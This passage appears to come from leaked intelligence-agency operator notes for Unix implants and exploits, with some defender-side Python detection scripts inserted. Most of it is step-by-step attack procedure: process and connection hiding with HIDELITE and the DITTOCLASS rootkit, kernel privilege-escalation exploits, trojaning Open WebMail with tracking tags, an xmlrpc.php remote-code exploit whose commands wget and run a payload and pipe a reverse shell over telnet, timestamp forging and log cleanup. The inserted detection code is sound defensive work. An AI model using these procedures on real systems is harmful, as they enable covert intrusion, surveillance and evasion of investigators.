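tcp        0      0 10.0.0.5:22             10.0.0.9:51022          ESTABLISHED
"""
NS_UNPRIVILEGED = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             10.0.0.9:51022          ESTABLISHED
"""

if __name__ == "__main__":
    pids, ports = hidden_entries(PS_PRIVILEGED, PS_UNPRIVILEGED, NS_PRIVILEGED, NS_UNPRIVILEGED)
    for p in pids.values():
        print(f"HIDDEN pid {p.pid} ppid {p.ppid} cmd {p.cmd!r}")
    for port in sorted(ports):
        print(f"HIDDEN listener on port {port}")
    for p in dangling_parents(PS_UNPRIVILEGED):
        print(f"pid {p.pid} has parent {p.ppid} that is not in the listing")
```

On the sample data the cross-view diff reports PID 2231 (`sendmail`) and port 32754, and the single-view check flags PID 2240 because its parent 2231 is missing from the ordinary listing. The single-view check is the one worth running routinely, since it needs no privileged vantage point; the cross-view diff is for when a second, independently obtained enumeration is available.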
###################################################################################
###
### END File user.tool.stoicsurgeon.COMMON
### (see also ../etc/user.tool.stoicsurgeon.COMMON)
###
### BEGIN File user.tool.dittlelight_hidelite.COMMON (see also ../etc/user.tool.dittlelight_hidelite.COMMON)
###
############################################################
# DITTLELIGHT (HIDELIGHT)
############################################################
### To run the unix oracle db scripts, you must do them outside of an INCISION process
### therefore, you can use DITTLELIGHT (HIDELITE) to unhide your nopen window
### You must run HIDELIGHT on a process with a parent PID of "1" so
### do a callback to your redirector and run hidelite on the callback window
### Hidelite
### Create a callback window
# On redirector:
-nrtun NOPEN_PORT
# On target:
-call REDIR_IP NOPEN_PORT
### upload the correct version of hidelite for sparc or linux in a temp directory:
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/bin/hidelite.sparc crond
# or
-put /current/bin/hidelite.linux crond
### Obtain the PIDs of your nopen windows.
### The callback window will have a parent pid of (1):
### Run -pid in each nopen window:
-pid
### In a nopen window OTHER than the callback window you are about to unhide,
### run hidelite to unhide the callback window:
./crond -u -p NOPEN_CALLBACK_WINDOW_PID
### Remove hidelite from the target:
-rm crond
### In the CALLBACK window, verify that this window has now lost its INCISION privileges
### and can no longer see the other nopen PIDS
ps -ef | grep NOPEN_PID
### In any window, you can run =psdiff to verify that either the callback window is
### unhidden or that the other (INCISION privileged) nopen windows are invisible
### to the callback window.
=psdiff
### You can now run the oracle queries in the UNHIDDEN CALLBACK window.
### When done, simply -exit the unhidden callback window.
### If for some reason you need to rehide a process, upload HIDELITE
### and run the following from a HIDDEN (privileged) window:
### To hide again
./crond -h -p NOPENPID
-rm crond
### If you were running oracle commands, you can now clean them up:
### Cleanup the logs created from the oracle scripts:
### ex:
# -ls -t /opt/mnt/oracle/product/9.2.0/rdbms/audit
# -rm
# -touch /opt/mnt/oracle/product/9.2.0/rdbms/audit/ora_1473.aud /opt/mnt/oracle/product/9.2.0/rdbms/audit
### Remove your working directory and -burn nopen when done with op
-cd /tmp
-rm .scsi
-lt /tmp
-burnBURN
###
### END File user.tool.dittlelight_hidelite.COMMON
### (see also ../etc/user.tool.dittlelight_hidelite.COMMON)
###
### BEGIN File user.tool.draftbagger.COMMON (see also ../etc/user.tool.draftbagger.COMMON)
###
##### DRAFTBAGGER #####
### Assumes have already talked to SNAT via SnatLp
### Search/replace commands
:%s/ROUTER_IP/ROUTER_IP/g
:%s/PROXY_IP/PROXY_IP/g
:%s/RADIUS_IP/RADIUS_IP/g
:%s/RANDOM_HIGH/RANDOM_HIGH/g
### These aren't really meant to be used as search/replace in this script, more
### placeholders for the example commands, but here are the commands anyway,
### commented out so you really shouldn't run them
#:%s/LOCAL_TUNNEL_COMMANDS_PORT/LOCAL_TUNNEL_COMMANDS_PORT/g
#:%s/NOPEN_PID/NOPEN_PID/g
#:%s/PARTIAL_MATCH_TARGS/PARTIAL_MATCH_TARGS/g
#:%s/EXACT_MATCH_TARGS/EXACT_MATCH_TARGS/g
### get the date of the current radius log on the radius server
-lt /var/log/radius/
# (find the most current, should be last file in list)
-lt /var/log/radius/
# (file needed is the acct.log file)
### run the following from radius server
-gs parse_rads -h
# (for -gs parse_rads usage syntax)
-gs parse_rads ROUTER_IP RANDOM_HIGH /var/log/radius/CURRENT_DATE/acct.log
### Will check to make sure the log file exists, check to make sure the
### "-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp" command was run, and then
### starts a "tail -f" on the logfile to constantly bring the file home,
### this gives you two pastables: a "-tunnel PORT udp" command to run on the
### radius server, and a "parse_rads.pl" one to run in a locally scripted window
### run the "-tunnel" (use the one spit out, the one below is an example) on
### the box that will be talking to SNAT
-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp
### IN A LOCALLY SCRIPTED WINDOW (pastable given by -gs parse_rads command)
parse_rads.pl -h
# for help with pastable options (run locally)
### Below is an example command, will need to use the pastable spit out by
### "-gs parse_rads" for the current session, but some things will need to
### be added to the command spit out, i.e. -p/-P args (phone numbers), the
### -R arg (treat already downloaded data as real-time, i.e. set up initial
### rules based on it), the IP address of the proxy, and any other stuff to
### play with
###
### -N -a -i are filled in by -gs parserads. Others need to be added manually
PORT=LOCAL_TUNNEL_COMMANDS_PORT parse_rads.pl -NRADIUS_IP:NOPEN_PID -a127.0.0.1:RANDOM_HIGH -i/current/down/HOSTNAME.RADIUS_IP/var/log/radius/CURRENT_DATE/acct.log -p PARTIAL_MATCH_TARGS -P EXACT_MATCH_TARGS -R PROXY_IP
### Will ask for pager numbers, and ask for confirmation that a sufficiently
### up-to-date version of SNAT is being used, go ahead and confirm these
### Should be able to get other instructions for DRAFTBAGGER UI
### when Op is complete, in the DB command window, run the following to close out
### NOTE: ANSWER "no" TO THE PROMPT ASKING WHETHER TO KEEP THE SNAT
###       FILTERS ACTIVE
diediedie
### Ctrl-C your "tail -f" command on RADIUS server, or kill the appropriate pid
### In a local window, you can use the scripts "closetunnel" and "dotunnel" to
### interact with a -tunnel listening on a port for commands rather than stdin
### (i.e. "-tunnel LOCAL_TUNNEL_COMMANDS_PORT udp")
### "dotunnel" will send all command line args to that port for -tunnel to get
### "closetunnel" has hard-coded "c 1 2 3 4 5 6 7", and then "q"...this will
### get the Nopen prompt back
# Examples:
dotunnel s
dotunnel l 1390 1.2.3.4 139
closetunnel
### CLOSE OUT THE REST OF THE OP AS YOU WOULD NORMALLY
###
### END File user.tool.draftbagger.COMMON
### (see also ../etc/user.tool.draftbagger.COMMON)
###
### BEGIN File user.tool.elgingamble.COMMON (see also ../etc/user.tool.elgingamble.COMMON)
###
#######################################
# ELGINGAMBLE
#######################################
### local exploit for the following operating system versions:
### Linux 2.6.13 - 2.6.17.4 and certain distros that contain a backport of the
### vulnerable functionality
### Local exploit for the public prctl core dump vulnerability in recent Linux kernels.
### It takes advantage of an input validation/logic error in the kernel to create
### a cron script that will spawn a root shell.
### OPSEC:
### vulnerability: public
### exploit: public
###
### CHECK IF TARGET IS VULNERABLE
###
### check OS (for Linux 2.6.13 - 2.6.17.4)
uname -a
### make sure crond is running:
ps -ef | grep crond
### check if you have READ permission on /etc/cron.d (WRITE is part of the vuln.):
-lt /etc/cron.d
### make sure you have EXECUTE permission on crontab:
which crontab
-lt /usr/bin/crontab
### check if there is a cron.allow or cron.deny that might hinder your success:
-lt /etc/cron*
-cat /etc/cron.allow
-cat /etc/cron.deny
###
### if the above checks pass, you can try running it:
### USAGE:
# elgingamble:
# -h (optional) Prints a help message
# -d (optional) Used to specify the system cron directory (defaults /etc/cron.d)
# -p (optional) Used to specify the core file prefix (defaults cron.PID)
# -s (optional) Used to specify a shell besides /bin/sh
# -t (optional) Used to specify the exploit timeout (defaults 5 minutes)
### upload to target:
-put /current/up/elgingamble eg
### within nopen, run it from within -shell
-shell ./eg
# You'll see the following messages, you must wait for the cronjob to run:
# can't set core limit, trying indirect
# crontab installed
# must do crontab -r when finished
# waiting for re-exec, ETA 60-120s
# after waiting for the cronjob, run the following and start a new noserver
# once you gain root access:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
PATH=. sendmail
### connect to privileged noserver:
-nstun TARGET_IP
### CLEANUP:
crontab -l
crontab -r
-lt /etc/cron.d
-rm /etc/cron.d/core.PID
-rm eg sendmail
-lt
### LOGS:
-lt /var/log/cron
-tail /var/log/cron
###
### TROUBLESHOOTING
###
# Exploit fails with message "kernel not vulnerable". The kernel is not vulnerable
# to exploitation.
# Remedy:None
# Exploit fails with message "failed: indirect". The exploit tried and failed to
# have cron call it indirectly to bypass resource limitations.
# This can occur if
# the crontab program is not installed, could not be found, or is restricted through
# the use of cron.allow and cron.deny.
# Remedy:Make sure crontab is installed on the system and usable by the system
# user you use to run the exploit.
# Exploit fails with message "failed". The exploit was unable to elevate to root.
# This indicates that the cron command was never executed. One possible reason for
# failure is if the coredump created in the system cron directory is too small to
# contain a valid cron command. Other reasons could be that the cron directory
# is not accessible by non-privileged users, or the cron daemon is not running on the system.
# Remedy:Make sure the cron daemon is running and the user running the exploit
# has read access to the system cron directory. Also check the core file limit.
#
# Description: Any other failure message. Remedy: Make sure the default exploit parameters,
# such as cron directory and core file prefix, are valid for the target system.
# If not, rerun the exploit and specify the appropriate parameters on the command line.
###
### END File user.tool.elgingamble.COMMON
### (see also ../etc/user.tool.elgingamble.COMMON)
###
### BEGIN File user.tool.enoltog.COMMON (see also ../etc/user.tool.enoltog.COMMON)
###
#######################################
# ENOLTOG
#######################################
### Software modification to the Open WebMail software to target specific users of interest.
### Used to insert a FOXACID/HUFFMUSH tag.
### Version 1 will target the first five users to log in to the system.
### Version 2 will target specific users.
### NOTE: Due to the uniqueness of each target and the source code modification required,
### SUGGEST DEVELOPER BE PRESENT DURING INITIAL DEPLOYMENT TO TARGET!!!!!!
###
### OPSEC:
# anyone viewing the source file will be able to see the added code.
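Added example (not code from the notes) of what a reviewer of that source file would look for: a Python scan for the two markers the notes describe, a string compare against a 32-hex MD5 literal and an img tag fetching from a host outside the mail server, plus a digest compare against the vendor copy. The Perl fragment and the host mail.example.com are constructed assumptions.

```python
"""Integrity check for an Open WebMail CGI script against the modification the
ENOLTOG notes describe: a per-user branch keyed on the MD5 of the login name and
an injected GIF tag that fetches from an outside host. Added example for this
page, not code from the notes; SAMPLE_SOURCE is a constructed Perl fragment and
mail.example.com is the assumed legitimate host."""
import hashlib
import re

# 'eq' against a 32-character hex literal: the "$md5 eq" lines the notes mention.
MD5_COMPARE = re.compile(r"""\beq\s*['"][0-9a-fA-F]{32}['"]""")
# <img ... src="http(s)://host/..."> with the full URL in group 1 and the host in group 2.
IMG_SRC = re.compile(r"""<img[^>]*?src\s*=\s*['"]?(https?://([^/'"\s>:]+)[^'"\s>]*)""",
                     re.IGNORECASE)


def scan_source(text, allowed_hosts):
    """Return [(line_number, reason)] for lines matching either pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if MD5_COMPARE.search(line):
            findings.append((lineno, "compare against 32-hex literal (per-user MD5 branch)"))
        for m in IMG_SRC.finditer(line):
            host = m.group(2).lower()
            if host not in allowed_hosts:
                findings.append((lineno, "img fetched from outside host %s (%s)"
                                 % (host, m.group(1))))
    return findings


def digest_matches(content, expected_md5):
    """Compare the file body with the digest recorded from the vendor package."""
    return hashlib.md5(content).hexdigest() == expected_md5.lower()


# Constructed sample: the tracking branch sits on lines 5-6, line 8 is a normal image.
SAMPLE_SOURCE = """#!/usr/bin/perl
use strict;
my $user = $ENV{REMOTE_USER};
my $md5 = md5_hex($user);
if ($md5 eq '5f4dcc3b5aa765d61d8327deb882cf99') {
    print qq|<img src="http://198.51.100.7/t.gif?tag=TAG" width="1" height="1">|;
}
print qq|<img src="http://mail.example.com/images/logo.gif">|;
"""
ALLOWED_HOSTS = {"mail.example.com"}

if __name__ == "__main__":
    for lineno, reason in scan_source(SAMPLE_SOURCE, ALLOWED_HOSTS):
        print("line %d: %s" % (lineno, reason))
```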
### INITIAL INSTALLATION PROCEDURE:
### access target
### pull original openwebmail file
locate openwebmail-main.pl
-get /var/www/cgi-bin/openwebmail/openwebmail-main.pl
###
### LOCALLY do the following:
###
### make a backup copy
cd /current/up
cp /current/down/HOSTNAME//var/www/cgi-bin/openwebmail/openwebmail-main.pl /current/up/openwebmail-main.pl
### edit ##ONE## of the following files, depending on the deployment type:
### For openwebmail-main-first-five-users.pl:
#############################################
# change the "<5" to the correct number of users
# change the target tag in the gif line - should NOT reuse the same
# target tag on different projects!!!!
### For openwebmail-main-users-time.pl:
#############################################
### determine the md5sum on each user:
echo -n USERNAME | md5sum
### use the md5sum as the tasking name in the lines that begin with "$md5 eq"
# change the target tag in the gif line - should NOT reuse the same
# target tag on different projects!!!!
### next, edit the local copy of the original file, and insert the code from the above
### step in the correct places
vi /current/up/m
###
### On target, upload the modified openwebmail:
###
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put openwebmail-main.pl m
-put openwebmail-test.pl o
### test that the version will first work:
./o
-ls
-strings rpm.db
-rm o rpm.db
### get ready to overwrite:
md5sum /var/www/cgi-bin/openwebmail/openwebmail-main.pl
diff /var/www/cgi-bin/openwebmail/openwebmail-main.pl m
-ls /var/www/cgi-bin/openwebmail
-ls
cat m > /var/www/cgi-bin/openwebmail/openwebmail-main.pl
### fix timestamps
-touch /var/www/cgi-bin/openwebmail/openwebmail-folder.pl /var/www/cgi-bin/openwebmail/openwebmail-main.pl
-ls /var/www/cgi-bin/openwebmail
###
### LOGGING:
###
locate access
-ls /var/log/httpd
-tail /var/log/httpd/access_log
tail -300 /var/log/httpd/access_log|grep openwebmail-main.pl
###
### CLEANUP DIRECTORY:
###
-rm m
-cd ..
-rm .scsi
-ls -t
### TROUBLESHOOTING:
# Determine the MD5 digest of the user
echo -n | md5sum
# Determine if showthread.php is executable
-ls /var/www/cgi-bin/openwebmail/openwebmail-main.php
# upload and run test script openwebmail-test.pl
-put /current/up/openwebmail-test.pl o
./o
# should see 1 2
# clean up results
###
### END File user.tool.enoltog.COMMON
### (see also ../etc/user.tool.enoltog.COMMON)
###
### BEGIN File user.tool.excelberwick.COMMON (see also ../etc/user.tool.excelberwick.COMMON)
###
#######################################
# EXCELBERWICK
#######################################
### remote exploit against xmlrpc.php on Unix platforms
###
### WILL REQUIRE LOCAL ELEVATION
### sybil location: CGI-BIN
### Exploits a vulnerability in the XML-RPC PHP script. The vulnerable
### file is used in a large number of web applications, such as Drupal,
### b2evolution, and TikiWiki. The vulnerability is the result of
### unsanitized data being passed directly to the eval() call
### in the parseRequest() function of the XML-RPC server
### OPSEC:
### vulnerability: public
### exploit: public
### Usage:
# ./xp_xmlrpc.pl
usage: ./xp_xmlrpc.pl -i -d -c
-i
-d
-p
-o
-v
-a
0: /xmlrpc.php
1: /blog/xmlrpc.php
2: /blog/xmlsrv/xmlrpc.php
3: /blogs/xmlsrv/xmlrpc.php
4: /drupal/xmlrpc.php
5: /phpgroupware/xmlrpc.php
6: /wordpress/xmlrpc.php
7: /xmlrpc/xmlrpc.php
8: /xmlsrv/xmlrpc.php
9: /b2/xmlsrv/xmlrpc.php
10: /b2evol/xmlsrv/xmlrpc.php
11: /community/xmlrpc.php
12: /blogs/xmlrpc.php
-c
Examples:
1) ./xp_xmlrpc.pl -i127.0.0.1 -d/drupal/xmlrpc.php -c"uname -a;ls -la;w"
2) ./xp_xmlrpc.pl -i127.0.0.1 -d/drupal/xmlrpc.php -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http://555.1.2.150:5555/sendmail -Osendmail;chmod +x sendmail;D=-c555.1.2.150:9999 PATH=. sendmail) 2>/dev/null"
### Check if PHP is there:
# from redirector:
-scan http TARGET_IP
# The response should include "PHP/" though the version doesn't necessarily matter
# Ex.
# response:
Server: Apache/2.0.40 (Red Hat Linux) mod_perl/1.99_05-dev Perl/v5.8.0 mod_auth_pgsql/0.9.12 PHP/4.2.2 mod_python/3.0.0 Python/2.2.1 mod_ssl/2.0.40 OpenSSL/0.9.6b DAV/2
mx
:%s/TARGET_IP/TARGET_IP/g
:%s/WEB_PORT/WEB_PORT/g
:%s/NETCAT_PORT/NETCAT_PORT/g
:%s/REDIR_IP/REDIR_IP/g
:%s/NOPEN_PORT/NOPEN_PORT/g
'x
### Then check if vulnerable by running the "-a" option to exhaust all options
# WEB-PORT is usually '80' unless the target is using something else, or you
# choose to tunnel it differently
# redirector:
-tunnel l WEB_PORT TARGET_IP
# local script window:
./xp_xmlrpc.pl -i127.0.0.1 -pWEB_PORT -a -c"w"
### Look through the output; a successful hit will be followed by
### the results of the command issued by the "-c" option, in the suggested case,
### the results of "w"
### Each unsuccessful version will be followed by "404 not found" errors
### If the previous command yielded a successful attempt, then run the exploit again
### but substitute the version that was successful instead of using "-a"
### Prepare the appropriate nopen version with an http header:
# Locally:
ls -l /current/up/noserver
file noserver
echo -e 'HTTP/1.0 200\n' > new
cat new ../up/morerats/noserver*-i586.pc.linux.gnu.redhat-5.0 > /current/up/sendmail
nc -l -v -p NETCAT_PORT < sendmail
# on redirector:
-nrtun NOPEN_PORT
### Replace "VERSION" with the appropriate php script, then run exploit to upload and execute nopen:
./xp_xmlrpc.pl -i127.0.0.1 -pWEB_PORT -d"VERSION" -c"mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http://REDIR_IP:NETCAT_PORT/sendmail -Osendmail;chmod +x sendmail;D=-cREDIR_IP:NOPEN_PORT PATH=. \
sendmail) 2>/dev/null"
### connect:
-nstun TARGET_IP
###
### TROUBLESHOOTING:
###
# Try this to get interactive windows (you'll type in one, and get output in the other):
mx
:%s/PORT1/PORT1/g
:%s/PORT2/PORT2/g
'x
# Local scripted window #1:
nc -l -vv -p PORT1
# Local scripted window #2:
nc -l -vv -p PORT2
# Local scripted window #3:
./xp_xmlrpc.pl -i127.0.0.1 -pWEB_PORT -d"VERSION" -c"sleep 100 | telnet REDIR_IP PORT1 | /bin/sh | telnet REDIR_IP PORT2"
###
### CLEANUP:
###
# Logging directory depends on type of web software running on target (check -find):
# Try /var/log/httpd:
# access_log
# referer_log
# error_log
###
### END File user.tool.excelberwick.COMMON
### (see also ../etc/user.tool.excelberwick.COMMON)
###
### BEGIN File user.tool.dittoclass.COMMON (see also ../etc/user.tool.dittoclass.COMMON)
###
##### DITTOCLASS #####
### Search/replace commands
### OLD PKG NAME: if DC prev installed, name of pkg, if not then leave alone
### OLD DITTOCLASS DIR: if DC prev installed, directory where it was installed
### NEW PKG NAME: name of new DC installation package
### NEW DITTOCLASS DIR: directory where DC will be installed
:%s/OLD_PKG_NAME/OLD_PKG_NAME/g
:%s/OLD_DITTOCLASS_DIR/OLD_DITTOCLASS_DIR/g
:%s/NEW_PKG_NAME/NEW_PKG_NAME/g
:%s/NEW_DITTOCLASS_DIR/NEW_DITTOCLASS_DIR/g
### Check to see if DITTOCLASS already on target (if fails, not implanted).
### Make sure check for other implants too.
### NOTE: Must use "cat", "-cat" will not work
### Doing "cat /proc/OLD_PKG_NAME" will register you to see hidden resources
### If neither of the "cat" commands work and you think there is an old
### installation, the "ls" command below should still work, if not there is
### probably nothing there
cat /proc/listfiles
cat /proc/OLD_PKG_NAME
ls -la /OLD_DITTOCLASS_DIR/OLD_PKG_NAME
### If DITTOCLASS already there but needs to be upgraded, go ahead and
### uninstall it, if not skip to "Upload the DC package and run..."
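Added defender-side example, not code from the notes, of how a cross-view check finds what DITTOCLASS hides (the !hideproc! / !hideconn! steps further down): a /proc/net/tcp capture and a /proc PID list taken independently of the host's own tools (from a memory or disk image, or a live-response agent) are parsed and diffed against the host's netstat -an and ps -ef output. All inputs below are constructed samples.

```python
"""Cross-view check for hidden processes and connections, the capability the
DITTOCLASS notes describe (!hideproc! / !hideconn! make a PID or a redirector
IP:port disappear from ps and netstat). Added example for this page, not code
from the notes; PROC_NET_TCP, NETSTAT_AN, PS_EF and PROC_PIDS are constructed."""
import socket
import struct


def _hex_addr(field):
    """'0100007F:1F90' (little-endian hex as in /proc/net/tcp) -> ('127.0.0.1', 8080)."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """{(lip, lport, rip, rport)} from the text of /proc/net/tcp (IPv4 only)."""
    conns = set()
    for line in text.splitlines()[1:]:          # first line is the column header
        fields = line.split()
        if len(fields) < 3:
            continue
        conns.add(_hex_addr(fields[1]) + _hex_addr(fields[2]))
    return conns


def parse_netstat(text):
    """Same tuple set from 'netstat -an' output; a '*' port is normalised to 0."""
    conns = set()
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or not fields[0].startswith("tcp"):
            continue
        lip, lport = fields[3].rsplit(":", 1)
        rip, rport = fields[4].rsplit(":", 1)
        conns.add((lip, 0 if lport == "*" else int(lport),
                   rip, 0 if rport == "*" else int(rport)))
    return conns


def hidden_connections(independent_view, netstat_view):
    """Connections present in the independent capture but missing from netstat."""
    return sorted(independent_view - netstat_view)


def parse_ps_pids(text):
    """PIDs from 'ps -ef' output (second column; header skipped)."""
    pids = set()
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) > 1 and fields[1].isdigit():
            pids.add(int(fields[1]))
    return pids


def hidden_pids(independent_pids, ps_text):
    """PIDs present in the independent /proc listing but missing from ps."""
    return sorted(set(independent_pids) - parse_ps_pids(ps_text))


# Constructed samples: the 10.0.0.5:40019 -> 203.0.113.9:23064 connection and PID 4242
# exist in the independent views but have been filtered from netstat and ps.
PROC_NET_TCP = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 00000000 300 0 0 2 -1
   1: 0500000A:9C53 097100CB:5A18 01 00000000:00000000 00:00000000 00000000     0        0 12346 1 00000000 20 4 30 10 -1
"""
NETSTAT_AN = """Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN
"""
PS_EF = """UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 09:00 ?        00:00:01 init
root       812     1  0 09:00 ?        00:00:00 crond
"""
PROC_PIDS = [1, 812, 4242]

if __name__ == "__main__":
    print(hidden_connections(parse_proc_net_tcp(PROC_NET_TCP), parse_netstat(NETSTAT_AN)))
    print(hidden_pids(PROC_PIDS, PS_EF))
```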
-ls /OLD_DITTOCLASS_DIR/uninstall_OLD_PKG_NAME.sh
# If it exists
/OLD_DITTOCLASS_DIR/uninstall_OLD_PKG_NAME.sh
### After uninstall, in a NOPEN window, grep for the old package name
### and kill any of the processes associated with it
netstat -anlp | grep OLD_PKG_NAME
ps -ef | grep OLD_PKG_NAME
kill -9 OLD_PKG_NAME_PIDS
### Make sure old connections/processes gone
netstat -anlp | grep OLD_PKG_NAME
ps -ef | grep OLD_PKG_NAME
### Make sure unable to connect with hector if connected with hector before
# Use whatever command used to get on
cd /current/bin
hector .... # your previous hector command line
### Upload the DC package and run the install script
### Removes itself upon installation
-put /current/up/NEW_PKG_NAME.tar.gz m.tar.gz
tar zxvf m.tar.gz
-lt
./install.sh
### Assuming installation script did not return any errors...
### Check to see if DC is seemingly working by seeing if the files are
### in fact being hidden
-lt /NEW_DITTOCLASS_DIR/ # should NOT see NEW_PKG_NAME in this listing
-lt /NEW_DITTOCLASS_DIR/NEW_PKG_NAME # SHOULD see NEW_PKG_NAME in this listing
### A little bit more search/replace fun
### TARGET IP: duh
### TARGET TRIGGER PORT: duh
### HECTOR CALLBACK IP: the IP for target to callback to (probably the window
### with the -tunnel)
### HECTOR CALLBACK PORT: the port for target to callback to
### RAWSEND PORT: local port to redirect the trigger packet
### SPOOF SRC IP: source IP of trigger packet
### BACKDOOR KEY: key to verify whether to call back or not
### should be located in:
### /current/bin/varkeys/projectname/ip.host/dittoclass
:%s/TARGET_IP/TARGET_IP/g
:%s/TARGET_TRIGGER_PORT/TARGET_TRIGGER_PORT/g
:%s/HECTOR_CALLBACK_IP/HECTOR_CALLBACK_IP/g
:%s/HECTOR_CALLBACK_PORT/HECTOR_CALLBACK_PORT/g
:%s/RAWSEND_PORT/RAWSEND_PORT/g
:%s/SPOOF_SRC_IP/SPOOF_SRC_IP/g
:%s/BACKDOOR_KEY/BACKDOOR_KEY/g
### Setup tunnel on redirector to contact agamemnon with hector
-tunnel u TARGET_TRIGGER_PORT TARGET_IP r HECTOR_CALLBACK_PORT
### Setup -rawsend for
### hector
-rawsend RAWSEND_PORT
##### Connect to agamemnon from LOCAL WINDOW
cd /current/bin
### For hector help in case need to play with the trigger line and the
### -tunnel stuff to get it right
./hector -v -h
./hector --backdoor --target-ip TARGET_IP --dest-port TARGET_TRIGGER_PORT --spoof-srcip SPOOF_IP --listen-port HECTOR_CALLBACK_PORT --control-ip HECTOR_CALLBACK_IP --udp -Z 127.0.0.1:RAWSEND_PORT --backdoor-trigger BACKDOOR_KEY
### Once connected to target thru hector
mkdir /tmp/.pci
cd /tmp/.pci
!help!
### To send a file via hector
### NOTE: Assume the working dir on target is "/tmp/.dir"
### Uploading the filename "crond" will be named "/tmp/.dir/crond" on target
### Uploading the filename "/etc/passwd" will be named "/tmp/.dir/_etc_passwd"
### on target
### Upload and run a NOPEN listener
!sendfile!
cp /current/up/morerats/NOPEN_TO_UPLOAD /current/bin/crond
crond # what called noserver in /current/down/HOSTNAME.TARGET_IP
PATH=. D=-lRANDOM_PORT crond
### From redirector:
-nstun TARGET_IP:RANDOM_PORT
### Or callbacks (may need to use this for multiple windows instead of -call)
PATH=. D=-cHECTOR_CALLBACK_IP:RANDOM_PORT crond
-nrtun RANDOM_PORT
-call HECTOR_CALLBACK_IP:RANDOM_PORT
### Register to be allowed to see hidden files/processes/conns
!register!
# Enter the new package name at prompt "Please enter the package name:"
NEW_PKG_NAME
# must see NEW_PKG_NAME> REGISTERED to know you are successful
### Hide processes and ports from hector window
# In each nopen window:
-pid
ps -auxww | grep crond
netstat -an | grep HECTOR_CALLBACK_IP
# Hide process in hector window (to unhide, run !unhideproc!)
!hideproc!
Please enter the Process ID you wish to unhide: PID_TO_HIDE
# Confirm in unregistered nopen window that pid is hidden
ps -auxww | grep PID_TO_HIDE
# Hide connection in hector window (to unhide, run !unhideconn!)
# NOTE: Always hide the end of the redirector, don't hide the target's
# Otherwise, legitimate connections might not show up
!hideconn!
Please enter the IP Address you wish to hide: HECTOR_CALLBACK_IP
Please enter the port you wish to hide: NOPEN_PORT
# Confirm in unregistered nopen window that conn is hidden
netstat -an | grep NOPEN_PORT
# make sure processes and connections are hidden
!listconns!
!listprocs!
# to exit hector
### Startup script
### Can modify startup script to add strifeworld or other progs that
### need to be started on boot
-lt /etc/rc#.d/S55NEW_PKG_NAME
-get /etc/rc#.d/S55NEW_PKG_NAME
### After modified...
-put MODIFIED_SCRIPT s
touch -r /etc/rc#.d/S55NEW_PKG_NAME t
cat s > /etc/rc#.d/S55NEW_PKG_NAME
touch -r t /etc/rc#.d/S55NEW_PKG_NAME
-rm s t
####################################################################
###
### END File user.tool.dittoclass.COMMON
### (see also ../etc/user.tool.dittoclass.COMMON)
###
### BEGIN File user.tool.expitiatezeke.COMMON (see also ../etc/user.tool.expitiatezeke.COMMON)
###
#############################
### EXPITIATEZEKE
#############################
### local exploit against the Linux 2.6.5 - 2.6.6 Fedora Core 2 kernel.
### EXPITIATEZEKE takes advantage of the chown vulnerability which allows
### you to change the gid on any file on the system to the current user's gid.
### This exploit is packaged into a single executable that when run
### will create a temporary file (shell spawning program), change the
### group owner of the device file of the partition that the temp file
### resides on (i.e. If the temp file was /tmp/file12345678 and /tmp was
### mounted on /dev/hdb3 then the device file /dev/hdb3 would have its
### group ownership changed.)
### After this takes place a cache flushing procedure occurs syncing the
### running filesystem with the contents of the disk.
### Once this finishes and if successful, a root shell is returned to the operator.
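Added defender-side example for the artifact just described, not code from the notes: a Python audit of block-device group ownership that reports any device whose group is outside the expected set or differs from a recorded baseline, including the gid-0 end state the cleanup section below mentions. SAMPLE_ENTRIES and the gids 6/500 are constructed.

```python
"""Audit of block-device group ownership, the on-disk artifact the EXPITIATEZEKE
notes describe: the device backing /tmp (e.g. /dev/hdb3) has its group changed
from 'disk' to the unprivileged user's gid, and clean-up may leave it at gid 0.
Added example for this page, not code from the notes; SAMPLE_ENTRIES is constructed."""
import grp
import os
import stat


def allowed_gids(names=("disk", "floppy", "cdrom", "root")):
    """Resolve the groups normally allowed on block devices; unknown names are skipped."""
    gids = set()
    for name in names:
        try:
            gids.add(grp.getgrnam(name).gr_gid)
        except KeyError:
            pass
    return gids


def collect_entries(dev_dir="/dev"):
    """(path, st_mode, st_gid) for every entry directly under dev_dir (symlinks not followed)."""
    out = []
    for entry in os.scandir(dev_dir):
        st = entry.stat(follow_symlinks=False)
        out.append((entry.path, st.st_mode, st.st_gid))
    return out


def check_entries(entries, allowed, baseline=None):
    """Report block devices whose group is outside 'allowed' or differs from a
    baseline snapshot {path: gid} (the 'before picture' the notes take with -ls).
    A baseline difference is reported even when the new gid is 0, which is the
    'less conspicuous' end state the clean-up section mentions."""
    findings = []
    for path, mode, gid in entries:
        if not stat.S_ISBLK(mode):
            continue
        if baseline is not None and path in baseline and baseline[path] != gid:
            findings.append((path, "group changed from %d to %d" % (baseline[path], gid)))
        elif gid not in allowed:
            findings.append((path, "unexpected group %d" % gid))
    return findings


# Constructed sample: gid 6 stands for 'disk', gid 500 for an ordinary user.
SAMPLE_ALLOWED = {0, 6}
SAMPLE_ENTRIES = [
    ("/dev/hda1", stat.S_IFBLK | 0o660, 6),
    ("/dev/hdb3", stat.S_IFBLK | 0o660, 500),
    ("/dev/null", stat.S_IFCHR | 0o666, 0),   # character device: ignored
]
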